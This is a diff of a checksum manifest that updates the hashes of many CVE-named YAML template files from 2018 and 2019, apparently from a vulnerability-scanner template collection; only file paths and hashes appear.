+http/cves/2018/CVE-2018-18323.yaml:4e85bb333a48897db6ea5f9e0d8405096cd2de80 +http/cves/2018/CVE-2018-18570.yaml:eb4cedbfcc2731d95eab1dc6e217d3ce76526b56 +http/cves/2018/CVE-2018-18608.yaml:1fae69f1c07aa1119f44f733c1e7e159a1852f15 +http/cves/2018/CVE-2018-18775.yaml:e2c93c4ec435289bbfd343c5fd16e70880f358c3 +http/cves/2018/CVE-2018-18777.yaml:37cc72c490fa1ff9343411a43d8ecd6dc4eca510 +http/cves/2018/CVE-2018-18778.yaml:242abc8166a12dbe79f3b8d79210f95424873544 +http/cves/2018/CVE-2018-18925.yaml:da5068c4c38ac86f86b9d3d41377832d8894dfad +http/cves/2018/CVE-2018-19136.yaml:667e1095c202c903c31a4504947eb83f8b73c6a7 +http/cves/2018/CVE-2018-19137.yaml:ded355433b8235f668e62deb51a04b94b6bab253 +http/cves/2018/CVE-2018-19287.yaml:0c935640b868601d7094353aef08a209512d4ea6 +http/cves/2018/CVE-2018-19326.yaml:f9ed3b8489e6b6a954d658424ad294766a559922 +http/cves/2018/CVE-2018-19365.yaml:b73be908c1fe790937d78c021b58fdb9d0b55d5f +http/cves/2018/CVE-2018-19386.yaml:1070f4035ea350307077b3d4bfc520f30b2ded28 +http/cves/2018/CVE-2018-19439.yaml:5fdd7d34f1e84983d799b2d8dbe97a6c8aa4d692 +http/cves/2018/CVE-2018-19458.yaml:043ee68392b1235506fa86fcb03fe71d872b58d2 +http/cves/2018/CVE-2018-19749.yaml:b6dd49a1d565a2d79f1a935378e393c9de9d2d3d +http/cves/2018/CVE-2018-19751.yaml:4e8c34c79eed2c350037efd3ed2e7cf87d9c2093 +http/cves/2018/CVE-2018-19752.yaml:bd00a233fc11b81b0be710a6250772165bc83629 +http/cves/2018/CVE-2018-19753.yaml:e685582ac8c104430a6857da0cc0f376ad6017df +http/cves/2018/CVE-2018-19877.yaml:d2c2564232bc0f55651b5cd690922189021a1481 +http/cves/2018/CVE-2018-19892.yaml:6dbb583cb48512e74e71c5d4b523e92cb6939aeb +http/cves/2018/CVE-2018-19914.yaml:c057101b38d517343f16080f4abfd4a41165cbad +http/cves/2018/CVE-2018-19915.yaml:80ea478afad4bbac4bc2a33b5460fd428061d200 +http/cves/2018/CVE-2018-20009.yaml:811afc451623b1ee9a4d58d5b8567b978b96b6e7 +http/cves/2018/CVE-2018-20010.yaml:cf468ab521846ca5b6c0dace7906b85088b0ff16 +http/cves/2018/CVE-2018-20011.yaml:0d781ad856ff1df6bfedd690141dd3ccb85109a7 +http/cves/2018/CVE-2018-20462.yaml:f7ad8a8e2bebc99ead954f03cd389393d599fa2a +http/cves/2018/CVE-2018-20463.yaml:5bb2d1edb7d70b290e78e5eea12d01f55a2f04cd +http/cves/2018/CVE-2018-20470.yaml:34d99a35fee493378d69dc4274a2c9f8c40e1d0a http/cves/2018/CVE-2018-20526.yaml:2f9df225281bc02274727a22b3fa89eb8a4e2155 -http/cves/2018/CVE-2018-20824.yaml:801edada9c936ce1a2f23f4164b6a799fd844045 -http/cves/2018/CVE-2018-20985.yaml:404fe656d819cdedc50f379519ef8d7d46eb2b55 -http/cves/2018/CVE-2018-2392.yaml:80321493599e71cb1d8b208a4f2fa11038bdad7c -http/cves/2018/CVE-2018-2791.yaml:0f61c2361141b84acea968b666ebda7f3a748215 -http/cves/2018/CVE-2018-2894.yaml:d6f2e3191a1886f5f93a264b3b4616ab1b49bf1f -http/cves/2018/CVE-2018-3167.yaml:774280bc6c6aab0ee521e3f2e21edfc9c6a826e3 -http/cves/2018/CVE-2018-3238.yaml:9562fca7144c8ec209de2eb174cd334f926c2079 -http/cves/2018/CVE-2018-3714.yaml:91db07d72a62f5802360d4cc5e0de77b753f2469 -http/cves/2018/CVE-2018-3760.yaml:ddf4ec266050dd2132d980dff8b561a14f08a625 -http/cves/2018/CVE-2018-3810.yaml:ec9a7bef7037e37a50983203abef513a6185cbf7 -http/cves/2018/CVE-2018-5230.yaml:4bdd7f424c78ae20862cb8b075e8fba6b71c2390 -http/cves/2018/CVE-2018-5233.yaml:7d7fe1c0f530b82eee83a024c5971ff652c02e96 -http/cves/2018/CVE-2018-5316.yaml:4f75a777521ebaafe0721d7f1fc471a0c759836e -http/cves/2018/CVE-2018-5715.yaml:edc2f38d70de407c89d33d610a4f169c95b15f7e -http/cves/2018/CVE-2018-6008.yaml:a987b95a8dd68fcd3af8a33426f9f8afd14c8315 -http/cves/2018/CVE-2018-6184.yaml:72601ef579ce46fa8472b6d7a097e337c234dc2b -http/cves/2018/CVE-2018-6200.yaml:da7db6b26a2e9294990541137180f2454d46a962 +http/cves/2018/CVE-2018-20824.yaml:949bf43e8a3129ab7e35a37375245482050baa1c +http/cves/2018/CVE-2018-20985.yaml:6301a415537bd5e8c61ddc06fe642f90a96c3e8e +http/cves/2018/CVE-2018-2392.yaml:7f0ff12c48e41ac9b214c761d6c0ef153fb5bfea +http/cves/2018/CVE-2018-2791.yaml:38168bd52162dd68831e0932804712418a4b8e3e +http/cves/2018/CVE-2018-2894.yaml:4d85b57dd08da772ed1cfd7f70d496a6ac857b46 +http/cves/2018/CVE-2018-3167.yaml:2f5404cc1027c7a29f9d9f927bb25e04233199f3 +http/cves/2018/CVE-2018-3238.yaml:56a8433a2e9c792e37f2f5e839c4904cb5a22516 +http/cves/2018/CVE-2018-3714.yaml:657b974a3038af344bf5ed41f2fbc7cde2277d5e +http/cves/2018/CVE-2018-3760.yaml:04a28220381a0d842eeb5ca48e3e5c0b1183a91b +http/cves/2018/CVE-2018-3810.yaml:e45fbe8aef168b8604a8ecb9bfb3fef33227cf66 +http/cves/2018/CVE-2018-5230.yaml:4dfb67de287df3d662eca026bb33cf529b472680 +http/cves/2018/CVE-2018-5233.yaml:339365b7bab7ec46d59fd5cf753f5156615a503f +http/cves/2018/CVE-2018-5316.yaml:c3de3dacf82d3eed46db00830d2d0a21af421c46 +http/cves/2018/CVE-2018-5715.yaml:95475d058485d10f885f4697fba1287e693803f4 +http/cves/2018/CVE-2018-6008.yaml:f4e343e6de058a0c15c71ccb05c7895cc942de42 +http/cves/2018/CVE-2018-6184.yaml:86a6d8e36284a2877e0daa70fb12ce513db32641 +http/cves/2018/CVE-2018-6200.yaml:b6602fc6b88afc75d79933fa1e6d569868e3c385 http/cves/2018/CVE-2018-6530.yaml:6e7e80783d4ea1cbc800478c36a743452b99ab21 -http/cves/2018/CVE-2018-6910.yaml:5844c1b4b62815cd864083d03d1b96f50d5b3f26 -http/cves/2018/CVE-2018-7251.yaml:e963d26ff0a3d7a95ce353d9e58b487d1de31254 -http/cves/2018/CVE-2018-7422.yaml:96c1ce327c3b749037553b6a469e1af75755cb12 -http/cves/2018/CVE-2018-7467.yaml:9ca67f80448813007ec4c9ff40371d0fb0f6fbf3 -http/cves/2018/CVE-2018-7490.yaml:98b03e6994088bb35496ac204362e73a6632c6d3 -http/cves/2018/CVE-2018-7600.yaml:76fd8f56372306262060516a8b1cfad3e3683ebf -http/cves/2018/CVE-2018-7602.yaml:fa6f5fb01f461c572ac4d7ac53cfd7c90fdb9d45 -http/cves/2018/CVE-2018-7662.yaml:942241821fd90b2bfbc9de0e746cddac1f29da79 -http/cves/2018/CVE-2018-7700.yaml:f3fca421e6b516dd9d8097b8d9cb81fe8652970d -http/cves/2018/CVE-2018-7719.yaml:9a93e24cf6cc6aae47c9db4ceebe9285f7307671 -http/cves/2018/CVE-2018-8006.yaml:bf823a05910ad023a4df6b0c0c2ceb438a9ab09c -http/cves/2018/CVE-2018-8033.yaml:6a6fda57a6293aefd6f49bed35d083130223909a -http/cves/2018/CVE-2018-8715.yaml:51b2ea9ccc788388a45c3041c8b0d3b0c81d4b87 -http/cves/2018/CVE-2018-8719.yaml:b88f118ae9fd1d3020fe2fdf39740b7f6c779304 -http/cves/2018/CVE-2018-8727.yaml:85d4ef9d354e8a97da870fe0a3fbc9ee92a623bf -http/cves/2018/CVE-2018-8770.yaml:6c8d0ff66f02411e5fe2dadce122d847e3996344 -http/cves/2018/CVE-2018-9118.yaml:7ebdcdb0dfbce65ed3d7c0cf4da7d9e6d74610b1 -http/cves/2018/CVE-2018-9161.yaml:b47aff6ef3ff1b2cd9324afa111a84a270ec6501 -http/cves/2018/CVE-2018-9205.yaml:b10f0e40abf6f0262093cd06f28b2bff753bebd6 -http/cves/2018/CVE-2018-9845.yaml:19313d842bd318cc8b27f42c1ef36090fe31e521 -http/cves/2018/CVE-2018-9995.yaml:1d906b4d08bffef4428f88c82faaecba85833787 +http/cves/2018/CVE-2018-6910.yaml:6fb429bd79763bf947211e9b3ab4c279c1a20ce8 +http/cves/2018/CVE-2018-7251.yaml:508aa86455e7988ae7168d677be715b0c88d32ed +http/cves/2018/CVE-2018-7422.yaml:b00f1e2d8da984addda984d60a640ed932114a57 +http/cves/2018/CVE-2018-7467.yaml:5440080373846e55da19747e3dc6d4b35f006fc8 +http/cves/2018/CVE-2018-7490.yaml:5ed97a1a86e2b67e8b1bd12d67d8f898f6ab8133 +http/cves/2018/CVE-2018-7600.yaml:25d0bc336abc3ef0148d1b47cb8e04aac2431d90 +http/cves/2018/CVE-2018-7602.yaml:c0d2a856f92da9d2ce11f3bc3c034104d66b775c +http/cves/2018/CVE-2018-7662.yaml:e2c281e21b42148b175ba282702c4196d7c09e6b +http/cves/2018/CVE-2018-7700.yaml:8aa6b726cdb8e0c7245119ae48525af001e1cb7a +http/cves/2018/CVE-2018-7719.yaml:4d3824fba1290828d48e832cc455c252b7d652b1 +http/cves/2018/CVE-2018-8006.yaml:a578338ffc053494adba4753d956850184ae0869 +http/cves/2018/CVE-2018-8033.yaml:fe81fee542d97d7f34291ac9e801baa894900684 +http/cves/2018/CVE-2018-8715.yaml:ee12b9a6cc2bb00a45a72ce9532c1027b5b22cd0 +http/cves/2018/CVE-2018-8719.yaml:4fc2d0c5d5df1c855a5ca7979a8dbadf42302eb8 +http/cves/2018/CVE-2018-8727.yaml:0214da48a9a38da6a63e48eafc07a73b701b9f15 +http/cves/2018/CVE-2018-8770.yaml:bdbe23222b5136fe5a120ad766507c5b21f4eaea +http/cves/2018/CVE-2018-9118.yaml:376bc5a74e9063683484d0bbb4e38616bdb6f5d7 +http/cves/2018/CVE-2018-9161.yaml:73e948c4c004340a9fc956e0e51c18c216752c8d +http/cves/2018/CVE-2018-9205.yaml:c862fb0602f668cb5db803a9486ae05df5b1f929 +http/cves/2018/CVE-2018-9845.yaml:74d00a19fcba0199c994c1f10b18339d8840da3f +http/cves/2018/CVE-2018-9995.yaml:3563d5f85f3131f8845fa3fae0ea80e8418b13ed http/cves/2019/CVE-2019-0193.yaml:c90ca23921fe798979faa2952227d67c78ef4eaa -http/cves/2019/CVE-2019-0221.yaml:52231abf5c354c514e4437d16742e9c34774ac80 -http/cves/2019/CVE-2019-0230.yaml:32f6439ea77f429c1295bef55dfddd7df7b3f4af -http/cves/2019/CVE-2019-10068.yaml:8111c317a4cde84dd68047f75ca1054ec023ba1d -http/cves/2019/CVE-2019-10092.yaml:f9bc78326438d4ba09c78bfe5444e442c8ade609 +http/cves/2019/CVE-2019-0221.yaml:00a353960af18ea3f258475f25db3c80190cc4e8 +http/cves/2019/CVE-2019-0230.yaml:b74fd38bc19b6dfc9659c8f8b5c0bee19e510a71 +http/cves/2019/CVE-2019-10068.yaml:d077729955d5e3f7ebf7b410a192172d5bf03900 +http/cves/2019/CVE-2019-10092.yaml:8c1efa439fa6cc715726121efb1af860ad12faf3 http/cves/2019/CVE-2019-10098.yaml:9dfa744a467172468ab770ba9c2d3fb8d9624573 -http/cves/2019/CVE-2019-1010287.yaml:be7ab1f88827db40d3a810aeb3ba78692d6bb299 -http/cves/2019/CVE-2019-1010290.yaml:6993819ff690d5b46f722b328e384ed3bf513d54 -http/cves/2019/CVE-2019-10232.yaml:18bce5c3906b8c4f1b6796ee301af4a46e939af6 -http/cves/2019/CVE-2019-10405.yaml:cb525d2675fe7ac36b747315f445f6b09f07a725 -http/cves/2019/CVE-2019-10475.yaml:c48ab271e5242c2d8b0e4c67dfe3ececadd14c52 -http/cves/2019/CVE-2019-10692.yaml:83fd9dab568a489bfdf22b53e1caa00ac6a3329f -http/cves/2019/CVE-2019-10717.yaml:c0cd2e6386acead19cdf4b142aee5d531e12ac7a -http/cves/2019/CVE-2019-10758.yaml:d6b1529af766fe0f131aa2b7c2c1a961e0a979e2 -http/cves/2019/CVE-2019-11013.yaml:78c1e74f704ebea8d8f2aaea6ed119d741491703 -http/cves/2019/CVE-2019-11248.yaml:c63e8ba351ba3fd4b22abc750a8712a1263333a6 -http/cves/2019/CVE-2019-11370.yaml:632ff4a00526d5726b11cfd2a429240e23829681 -http/cves/2019/CVE-2019-11510.yaml:2857fa498c463dbf19cb0dcdf1954f8a15f990b2 -http/cves/2019/CVE-2019-11580.yaml:034e962ada5fa6ce72824ac8e740a61fe27493ed -http/cves/2019/CVE-2019-11581.yaml:bbdabde144e09e621aa550ae8e49fa6965d44e40 -http/cves/2019/CVE-2019-11869.yaml:06e0024eb55626b19a680365652e44e8b620658a -http/cves/2019/CVE-2019-12276.yaml:339e4547c2fa01b67abfeaaa60b10407eef9a2cf -http/cves/2019/CVE-2019-12314.yaml:ccf4dc04650deefb66eb7e9f20347fe3fdc1dce1 -http/cves/2019/CVE-2019-12461.yaml:725b55559f8ef676a5a332570430d155bee1f09d -http/cves/2019/CVE-2019-12581.yaml:1c1cae7f992a16b45a38175428eb9d7a818ca07f -http/cves/2019/CVE-2019-12583.yaml:313a0dc94f1bd80af702ab4a02df08357b690a41 -http/cves/2019/CVE-2019-12593.yaml:5d0d454bfe9336efd65b1dc9ecc4b6d7333666bf -http/cves/2019/CVE-2019-12616.yaml:2cc5b0a3bb47d4a750249c3578b81192fcbd320e -http/cves/2019/CVE-2019-12725.yaml:08547b6460f79bfec7130bf6304b2c430dd9b9dd -http/cves/2019/CVE-2019-12962.yaml:feaf1695b400ec83b70bddf95ac4f8c9f26e7314 -http/cves/2019/CVE-2019-12985.yaml:c7d6e7033aa6aa8de171dfa5a3a691e53cd46be6 -http/cves/2019/CVE-2019-12986.yaml:f9e68594f8fe3bb6132a6ccd8c31b6e60401da6c -http/cves/2019/CVE-2019-12987.yaml:1b019db066b3891bf5d813da1e985b139ca3cbb0 -http/cves/2019/CVE-2019-12988.yaml:b137d4650981e0dbb15c3aad8aa2d88088d5bed7 -http/cves/2019/CVE-2019-12990.yaml:323f21ab09826b61f8a522980bbe6885102427f0 -http/cves/2019/CVE-2019-13101.yaml:5b75b80f3646b97555d4bb3a7d6757ba21359e22 -http/cves/2019/CVE-2019-13392.yaml:f53af0a85f2dc41779609f498137796e2c3327e4 -http/cves/2019/CVE-2019-13396.yaml:b67ec7f172a50aaf032d8823661059298cd06619 -http/cves/2019/CVE-2019-13462.yaml:304c5011ce61f934dbff5123af20e49fbc669f82 -http/cves/2019/CVE-2019-14205.yaml:8995c4c68310b90c4a64380c644e278ecf3c0092 -http/cves/2019/CVE-2019-14223.yaml:b7f5b0ec5ccd97a7d3ca3d3df64d1a7bad91891d -http/cves/2019/CVE-2019-14251.yaml:89b201cad2d15501868495372d86588fd0c43108 -http/cves/2019/CVE-2019-14312.yaml:29230ee82e33dba91c3774b122bc35090a37f705 -http/cves/2019/CVE-2019-14322.yaml:0a9bd7af565eebc40f742b33abd5fa5c10f50813 -http/cves/2019/CVE-2019-14470.yaml:e503b60f894f62b5ce60b3483a4a618cb36de336 -http/cves/2019/CVE-2019-14530.yaml:0daf3e8c25b0094c0b9225f3acdb8618f3ed91c7 -http/cves/2019/CVE-2019-14696.yaml:9331ce4c80a481037df44a995fb148f68fbdad85 -http/cves/2019/CVE-2019-14789.yaml:138c062edb1a7d38a5e04269646e310daae88366 -http/cves/2019/CVE-2019-14974.yaml:e10b505b004e0d46806d73f345cfb55f5b43489e -http/cves/2019/CVE-2019-15043.yaml:176d1a8d6a9a86cd03446c84b59958583ee9de65 -http/cves/2019/CVE-2019-15107.yaml:56d1331c80982df80e1cc0324f0b59b8a49d3b31 -http/cves/2019/CVE-2019-15501.yaml:84d3bfc749f96329416be4677682d507d39b9ffc -http/cves/2019/CVE-2019-15713.yaml:cb88a6a5ec3947df213dd8ec6f1ec03886e20b0d -http/cves/2019/CVE-2019-15811.yaml:a09aa4bab65c5e113d40aa6920bca9dcc8d503bf -http/cves/2019/CVE-2019-15858.yaml:00f0f1d1dbfdca7d674573b3612cd955b79baad1 -http/cves/2019/CVE-2019-15859.yaml:dc38ce4092fc89f5489a3057e8b11e60ff4187da -http/cves/2019/CVE-2019-15889.yaml:5ff95ae0da371683c29132376020d3b30d6a1206 -http/cves/2019/CVE-2019-16097.yaml:2e2b3fcbfef1c05c0173a4f19422b4535bcfa445 -http/cves/2019/CVE-2019-16123.yaml:96e135435e3cf05f21d99ffd1212f35815b0eed1 -http/cves/2019/CVE-2019-16278.yaml:7a298558114f15926fec19f3b4e7e253bb63930a -http/cves/2019/CVE-2019-16313.yaml:18b1811652f39d5462b415ea02f20e024a627594 -http/cves/2019/CVE-2019-16332.yaml:7fb065cf4dcf7030b1d79a4702f316f9ab93bdf7 -http/cves/2019/CVE-2019-16525.yaml:6813795e28e256e9680a6221ca475c3bc998d142 -http/cves/2019/CVE-2019-1653.yaml:fc2d63eaa81199c56d1bfe44fb188396601377d7 -http/cves/2019/CVE-2019-16662.yaml:22c9daa0d759a62387b7ce5bdb3ea7bfa21e7480 -http/cves/2019/CVE-2019-16759.yaml:6d00e12504de9e9d2c52b15a2cdded08ce17db5e -http/cves/2019/CVE-2019-16920.yaml:d0a4840c64690182958e2e23a58b242b13d52cd7 -http/cves/2019/CVE-2019-16931.yaml:d6ae353fececd87fe37de3aa12a0a24a0700c55e -http/cves/2019/CVE-2019-16932.yaml:3754e3902a4891265a3ff5eef7df5468b95c7ea8 -http/cves/2019/CVE-2019-16996.yaml:b52fbe7050b0a423cd6f40b6507ecac0e5ebd304 -http/cves/2019/CVE-2019-16997.yaml:f60651f43c8b12dad6a52968a5aa8a6bc9954de7 -http/cves/2019/CVE-2019-17270.yaml:b972fbfd7524d50331d22f8d418e6973c763de11 -http/cves/2019/CVE-2019-17382.yaml:cfbc0e1e9bed101e615c82389e9657c05257ebc4 -http/cves/2019/CVE-2019-17418.yaml:41d2ee85a3c2b91f466ffc99395aa31d278f5ddd -http/cves/2019/CVE-2019-17444.yaml:7deab77f1abd22d9c6b86e2e935fc06a1206e482 -http/cves/2019/CVE-2019-17503.yaml:c864d62b64a0852a2d14f1e8d16268170c1c3209 -http/cves/2019/CVE-2019-17506.yaml:b2bf5ad200b8515faa95389dc613a95250952e40 -http/cves/2019/CVE-2019-17538.yaml:a42c349dcee6e2510e80f293b338273500b77a00 -http/cves/2019/CVE-2019-17558.yaml:43ece44d0ddef0f1e14c1ce7c1a117e16550630c -http/cves/2019/CVE-2019-1821.yaml:00412f80275ba61337dc271cb0e6b11cb6f75e0d -http/cves/2019/CVE-2019-18371.yaml:c6e712f891f088b5d878b20c4e7ae5677d3d0178 -http/cves/2019/CVE-2019-18393.yaml:58b15f2790fda79399d1fddde5edfd2bb8f14aef +http/cves/2019/CVE-2019-1010287.yaml:c3c2070bd2f7a0462db0c01ddaedd7a8a123a9a5 +http/cves/2019/CVE-2019-1010290.yaml:11627e7aa9794ee3a4f2660f3beb40119b64e05e +http/cves/2019/CVE-2019-10232.yaml:4321b767daefff8a327bc49702f1bb00a70bded0 +http/cves/2019/CVE-2019-10405.yaml:d14a8b4263e094093bb56653e76a9a5f3b22cff6 +http/cves/2019/CVE-2019-10475.yaml:f37d6f051f07465d2a85566898acc1ff90cd0c20 +http/cves/2019/CVE-2019-10692.yaml:a72f16596996138a0ae0355c3eda3178eacf211a +http/cves/2019/CVE-2019-10717.yaml:c9782cf0bcfaeec3ac2771f90ba67b34914315f6 +http/cves/2019/CVE-2019-10758.yaml:c2b529c22f79b640d0850d9e44c7c3eddc55b384 +http/cves/2019/CVE-2019-11013.yaml:65756b3c3c59b7f5ec7db16a004bfa2e0a3f8a96 +http/cves/2019/CVE-2019-11248.yaml:248ea565ed8ecd2bf95ff32ed67ca357932e897b +http/cves/2019/CVE-2019-11370.yaml:2df7f30029f6bae950d6de6ec1e31b12a4abfbda +http/cves/2019/CVE-2019-11510.yaml:cab29c68070587ec78e2c3b46e62b130d255e314 +http/cves/2019/CVE-2019-11580.yaml:f06235b5d54a48fb502d590516271879948c8010 +http/cves/2019/CVE-2019-11581.yaml:422e0ce8794e4a6a19faec7f29ad9fbd28a91c3e +http/cves/2019/CVE-2019-11869.yaml:ad7e587badbf9e679bcfed31353e9d2a8babe034 +http/cves/2019/CVE-2019-12276.yaml:3a6909f8ede4c5e96846c626aca62be4d066aaa0 +http/cves/2019/CVE-2019-12314.yaml:47e4f497544608e3d8f41a7b17137e65b0e36f37 +http/cves/2019/CVE-2019-12461.yaml:716fe75f4550ab70e865b29ef2a5bf0b906b4c04 +http/cves/2019/CVE-2019-12581.yaml:dd466908f28b7ed82841026a46c375be5919d097 +http/cves/2019/CVE-2019-12583.yaml:3e82902ca90304d691d751ec743e17241e1dccf3 +http/cves/2019/CVE-2019-12593.yaml:f1f957a3070a6f9527f31a8960407ebbf6a22c9d +http/cves/2019/CVE-2019-12616.yaml:e55484b160d94ce14a6e9a86955d4ddbb92cdc40 +http/cves/2019/CVE-2019-12725.yaml:4f897d0eee45d773106c471813edc6b78c85cde2 +http/cves/2019/CVE-2019-12962.yaml:7fd80f3d1d3496fa0f478d37b337bde25cd1aaf6 +http/cves/2019/CVE-2019-12985.yaml:a1aea601102cd810c72ee8233222325206cb2380 +http/cves/2019/CVE-2019-12986.yaml:cd19263c76520fe3f63a63338d2101d034469970 +http/cves/2019/CVE-2019-12987.yaml:a14f28ca9cce47308e2debca4fe90c4c4cf1f703 +http/cves/2019/CVE-2019-12988.yaml:c46d672264423bdfa7c2bc4f5073c51311b28b7f +http/cves/2019/CVE-2019-12990.yaml:c25a244a97b6e7c9aeb6b84e49bea33e46382f50 +http/cves/2019/CVE-2019-13101.yaml:0c425e3ad4cf936e073ef1c0a76a3282d704cce4 +http/cves/2019/CVE-2019-13392.yaml:84969167b6469ca4f3625ff3321d93cf414d588e +http/cves/2019/CVE-2019-13396.yaml:cdb828f37e3bf96e67039512514dfe9e6ba1bdc0 +http/cves/2019/CVE-2019-13462.yaml:9619e69614dd2024ae3e166a6022a35055cbf470 +http/cves/2019/CVE-2019-14205.yaml:0a7048e6fa647ba257182eb1eb0cd93fc6e03469 +http/cves/2019/CVE-2019-14223.yaml:cbba302b3e2140309e124d0944087a6e82b9c5a9 +http/cves/2019/CVE-2019-14251.yaml:a5d7c30864030720b4f656bd34ed76b73d45a57e +http/cves/2019/CVE-2019-14312.yaml:92bbe9439549df4e45f69ad151ed63fc6bc5bc69 +http/cves/2019/CVE-2019-14322.yaml:2d61b5e7f6f1f42a365bd31fbeed7a2fe8f884b1 +http/cves/2019/CVE-2019-14470.yaml:007704e677c59e4e56689a29a11b18abcf71ff7d +http/cves/2019/CVE-2019-14530.yaml:e7b980620c4175634d671ac585d01a09380cc911 +http/cves/2019/CVE-2019-14696.yaml:170152df6ecf2d033c1b1a91cae9defb68aca893 +http/cves/2019/CVE-2019-14789.yaml:641191d2791ffef78136f2ccc6ee02dbd25dc606 +http/cves/2019/CVE-2019-14974.yaml:546494b138133ef23549550e5aa6b6ead2da4d7f +http/cves/2019/CVE-2019-15043.yaml:ea372d3921b66397bdb34e1166b00fb1a9fa6d7f +http/cves/2019/CVE-2019-15107.yaml:ea2a6e296c709411c098b4e23772a4a7483a87bd +http/cves/2019/CVE-2019-15501.yaml:7338c7f9fafc2384b27d53ba2d3772e3122557b5 +http/cves/2019/CVE-2019-15713.yaml:af903e148eab3517a4a27006b8a8f64e42a0b383 +http/cves/2019/CVE-2019-15811.yaml:a7c4ca7491887d508c82adbbd9e5c4e355fe43d9 +http/cves/2019/CVE-2019-15858.yaml:88d9d1f7f1d8e587a4dca7fdde281b89c6c42015 +http/cves/2019/CVE-2019-15859.yaml:8277f0a6f24b4c5f25e6c2dd71a94a7afd28d07c +http/cves/2019/CVE-2019-15889.yaml:2d54e07a6dc3fff946106ebf5a4f9ecd45024736 +http/cves/2019/CVE-2019-16097.yaml:df8108b24a65975d18371c5af59aa4b0225dcd33 +http/cves/2019/CVE-2019-16123.yaml:958c61d78531c82906291301acb890c8016b2295 +http/cves/2019/CVE-2019-16278.yaml:1867de4fb8468fb83faf095ff77f8b254376436e +http/cves/2019/CVE-2019-16313.yaml:edea3286024883c906b05d3646377fc7ccffd8fb +http/cves/2019/CVE-2019-16332.yaml:2e84ac211f9f992cd05fa087befd6f6c60bba7e7 +http/cves/2019/CVE-2019-16525.yaml:6e862fa9a1e885990dee39136bf69531461e025e +http/cves/2019/CVE-2019-1653.yaml:25124c10b580e9da286ba16e33f669c2504972ee +http/cves/2019/CVE-2019-16662.yaml:8c9eb30b937fcebfdc85be11264147b21ab5c6e4 +http/cves/2019/CVE-2019-16759.yaml:fd55f85d9f9f9626c723e7ee4a893006b77a7cb4 +http/cves/2019/CVE-2019-16920.yaml:1a1f0e3a4167deca721439f182daca6539c90bd2 +http/cves/2019/CVE-2019-16931.yaml:edae0cdfb8448d2d4e5533e0d28421701a067e10 +http/cves/2019/CVE-2019-16932.yaml:9ad44660e83bb7ebea144b9345e7b2a519482215 +http/cves/2019/CVE-2019-16996.yaml:0a3cfb9332cf744ce1f2d03a94e1d0110a46a63e +http/cves/2019/CVE-2019-16997.yaml:b5eea4bcf4941880cf1933174e2de2366e3a0061 +http/cves/2019/CVE-2019-17270.yaml:eaeb5961e71a47392a7df8b2b9741f532e2d3aff +http/cves/2019/CVE-2019-17382.yaml:7169c04980afbad407e7f024da155edbbb2fd3d0 +http/cves/2019/CVE-2019-17418.yaml:0c4e5205962ee971c0f416aad977d3b2a63466cd +http/cves/2019/CVE-2019-17444.yaml:43a868b4b3f970628005f4bac129be9b0b4111e5 +http/cves/2019/CVE-2019-17503.yaml:36e6742fd89fee819d22c6f7674b57c23aca6649 +http/cves/2019/CVE-2019-17506.yaml:3fb42528649b4e95d14f3ac5379f58fa5f5a9525 +http/cves/2019/CVE-2019-17538.yaml:32796d6417043fd920fb974a5aa664369d8e5d3d +http/cves/2019/CVE-2019-17558.yaml:9cc849cb1cee9383805a2f7ed5c73b89a6094413 +http/cves/2019/CVE-2019-1821.yaml:c27a5b46d488cce12e35ff8a1176da3812d043ba +http/cves/2019/CVE-2019-18371.yaml:a6e031a9b12730453e1f521343f8a527af8df407 +http/cves/2019/CVE-2019-18393.yaml:6be4dc8a55ff0e1fd21327728fa15fb1b7508457 http/cves/2019/CVE-2019-18394.yaml:0db49640c872cc37a310346e939081d38e8fdbb1 -http/cves/2019/CVE-2019-18665.yaml:ae85da679fc489308e12c8096b91134df53a6899 -http/cves/2019/CVE-2019-18818.yaml:40d270b5ca6642318cb88e74af29e7d60c014d33 -http/cves/2019/CVE-2019-18922.yaml:b410bf697f2df549b0e8ed3b557e402570958635 -http/cves/2019/CVE-2019-18957.yaml:9adc562245de4dc44a4bdad27bbcb69c41a34b37 -http/cves/2019/CVE-2019-19134.yaml:5e4bd17eff1b1080314391ac70f752ba55a6025e -http/cves/2019/CVE-2019-19368.yaml:4cf6ef5557d4cdcbb0a9fd377e2d712570a11b4b +http/cves/2019/CVE-2019-18665.yaml:08125cf3d6f81aeaeac9e1e70f2c8c3c9918a000 +http/cves/2019/CVE-2019-18818.yaml:ab7a26102259f02f57f102fd94f2ca1a2d45a225 +http/cves/2019/CVE-2019-18922.yaml:91531213055842347e00baf51eeeaa615bb0f161 +http/cves/2019/CVE-2019-18957.yaml:0baf8ea6d8718c9e9ebff5573398698577397541 +http/cves/2019/CVE-2019-19134.yaml:6fce8117ca13bedb8fcce7ef1d3bbc4ad05c5524 +http/cves/2019/CVE-2019-19368.yaml:b90d61266376300dd939d04211c3ce0e73fc4473 http/cves/2019/CVE-2019-1943.yaml:9088968d9cc90b8d84fab3fec4b18d2341e73ace -http/cves/2019/CVE-2019-19781.yaml:9df9f5e3a2c75a78705cae885c44bbe6f670474a -http/cves/2019/CVE-2019-19824.yaml:7c702ac5a64bd8dcb03a113448dcaa7f618a5c13 -http/cves/2019/CVE-2019-19908.yaml:c69a7b5741e52b4e1f2667a3215b3662c75b5586 -http/cves/2019/CVE-2019-19985.yaml:90a7dfb504c42d5a3af24a57af307952a13a69ec -http/cves/2019/CVE-2019-20085.yaml:320e46678e51c05267cf366fc63da0120da386e7 -http/cves/2019/CVE-2019-20141.yaml:61bfbc244a6afc5c9d6bab80d73ff96694b9e940 +http/cves/2019/CVE-2019-19781.yaml:39620527451a692d1931eb88b16e2a5406ada98a +http/cves/2019/CVE-2019-19824.yaml:177ace1afd2fcf0f90c522dcbd20290cf9d3884c +http/cves/2019/CVE-2019-19908.yaml:7b73390ad1b9eccb577ccbaa906545ebc4864114 +http/cves/2019/CVE-2019-19985.yaml:e5dc962c9f06e6c191e33deb189eef19691848a8 +http/cves/2019/CVE-2019-20085.yaml:115795a02561d772c1aec72d3f301df2de782c75 +http/cves/2019/CVE-2019-20141.yaml:8b9136011de48c3faf82bac644e041554b8b49ab http/cves/2019/CVE-2019-20183.yaml:740cea4d2f6a22dafebe29ee025a05f6919c2830 -http/cves/2019/CVE-2019-20210.yaml:697e8f8cb9de9c960156fae1ea1717b48b279d2f -http/cves/2019/CVE-2019-20224.yaml:97bfa0f15696fdec116a19a3595a4430375ef3cb -http/cves/2019/CVE-2019-20933.yaml:35576557d9ab134ade3a918715ff810a5b985d4c -http/cves/2019/CVE-2019-2578.yaml:6ce81dcf51e041a07169c7f30fc1029df4445804 